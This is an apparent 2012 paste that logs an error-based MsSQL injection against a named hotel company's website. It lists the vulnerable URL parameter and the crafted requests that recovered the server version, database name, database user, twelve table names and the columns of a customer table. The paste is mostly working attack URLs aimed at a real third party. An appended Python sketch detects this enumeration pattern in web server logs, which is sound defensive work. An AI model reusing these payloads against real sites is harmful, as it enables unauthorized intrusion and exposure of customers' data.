zerofreak

Tiaraa MsSQL Injection Progression

Jan 19th, 2012
  1. Website: http://www.tiara-hotels.com/
  2. Vulnerable Link: http://www.tiara-hotels.com/hotel.asp?id_hotel=1'
  3. Vulnerability: MsSQL Injection (Not Blind)
  4. ######################################################################################################################################################
  5. Version: X64 2010 64-bit Windows NT 5.2 Service Pack2
  6. http://www.tiara-hotels.com/hotel.asp?id_hotel=@@version
  7. ######################################################################################################################################################
  8. Database Name: tiaraSQL
  9. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,db_name())--
  10. ######################################################################################################################################################
  11. Current User: tiaraleitura
  12. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,user_name())--
  13. ######################################################################################################################################################
  14. Table1: table_CONTEUDOS
  15. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables))--
  16.  
  17. Table2: table_FREE_PAGES
  18. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS')))--
  19.  
  20. Table3: table_GALERIA
  21. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES')))--
  22.  
  23. Table4: table_GALERIA_BLOCO
  24. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA')))--
  25.  
  26. Table5: table_HEADER
  27. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO')))--
  28.  
  29. Table6: table_HOTEL
  30. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER')))--
  31.  
  32. Table7: table_CLIENTE
  33. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL')))--
  34.  
  35. Table8: table_LANDING_PAGE
  36. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE')))--
  37.  
  38. Table9: table_UTILIZADORES_HOTEL
  39. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE')))--
  40.  
  41. Table10: table_PRESS
  42. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE','table_UTILIZADORES_HOTEL')))--
  43.  
  44. Table11: table_PRESS_CATEGORIA
  45. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE','table_UTILIZADORES_HOTEL','table_PRESS')))--
  46.  
  47. Table12: table_PROMOCOES_HOTEL
  48. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE','table_UTILIZADORES_HOTEL','table_PRESS','table_PRESS_CATEGORIA')))--
  49. #######################################################################
  50. #######################################################################
  51. Extracting columns from table: "table_CLIENTE"
  52.  
  53. Column1: ID
  54. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'))--
  55.  
  56. Column2: CLIENTE
  57. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID')))--
  58.  
  59. Column3: ESTATISTICAS
  60. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE')))--
  61.  
  62. Column4: WEBMAIL
  63. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS')))--
  64.  
  65. Column5: AUTOR
  66. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL')))--
  67.  
  68. Column6: NOME
  69. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR')))--
  70.  
  71. Column7: URLSITE
  72. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR','NOME')))--
  73.  
  74. Column8: URLBLUESOFT
  75. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR','NOME','URLSITE')))--
  76.  
  77. Column9: upsize_ts
  78. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR','NOME','URLSITE','URLBLUESOFT')))--
  79. ######################################################################################################################################################
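
Detection note (an added example, not part of the original paste): the requests above leave a recognisable trail in web server logs, namely a `convert(int, ...)` wrapper around a metadata lookup and a `not in (...)` list that grows by one name per request. The sketch below flags that walk per client; the four-field log layout, the IP addresses and the table names `t_a`/`t_b` are constructed, and the HTTP 500 status for the error responses is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Indicators taken from the request shapes listed on this page.
CAST = re.compile(r"convert\s*\(\s*int\s*,", re.I)          # forces the conversion error
META = re.compile(r"information_schema\.(?:tables|columns)|@@version"
                  r"|\b(?:db_name|user_name)\s*\(", re.I)   # metadata being read
NOT_IN = re.compile(r"not\s+in\s*\(([^)]*)\)", re.I)        # names already recovered

def classify(value):
    """Return (has_cast, has_metadata, number of names in the NOT IN list)."""
    m = NOT_IN.search(value)
    excluded = len(re.findall(r"'[^']*'", m.group(1))) if m else 0
    return bool(CAST.search(value)), bool(META.search(value)), excluded

def detect(log_lines, min_steps=3):
    """Group suspicious requests by (client, page, parameter) and report walks."""
    seen = defaultdict(list)
    for line in log_lines:
        ip, stem, query, status = line.split()   # constructed 4-field layout
        # parse_qsl URL-decodes each value, so %27 and ' are treated alike.
        for name, value in parse_qsl(query, keep_blank_values=True):
            cast, meta, excluded = classify(value)
            if cast or meta:
                seen[(ip, stem, name)].append((excluded, status))
    alerts = []
    for (ip, stem, name), reqs in seen.items():
        sizes = [n for n, _ in reqs]
        # One step = the exclusion list grew by exactly one name since the last request.
        steps = sum(1 for a, b in zip(sizes, sizes[1:]) if b == a + 1)
        if steps + 1 >= min_steps:
            alerts.append({"client": ip, "page": stem, "param": name,
                           "requests": len(reqs), "names_walked": max(sizes) + 1,
                           "http_500": sum(s == "500" for _, s in reqs)})
    return alerts

_Q = "id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables"
SAMPLE_LOG = [  # constructed lines: c-ip cs-uri-stem cs-uri-query sc-status
    "203.0.113.7 /hotel.asp id_hotel=1 200",
    "198.51.100.20 /hotel.asp id_hotel=convert(int,db_name())-- 500",
    "198.51.100.20 /hotel.asp " + _Q + "))-- 500",
    "198.51.100.20 /hotel.asp " + _Q + "+where+table_name+not+in+('t_a')))-- 500",
    "198.51.100.20 /hotel.asp " + _Q + "+where+table_name+not+in+('t_a','t_b')))-- 500",
    "203.0.113.7 /hotel.asp id_hotel=2 200",
]
```

An alert from `detect` on a numeric parameter such as `id_hotel` also identifies the page that needs a parameterized query and generic error pages, since the walk only works while conversion errors are echoed to the client.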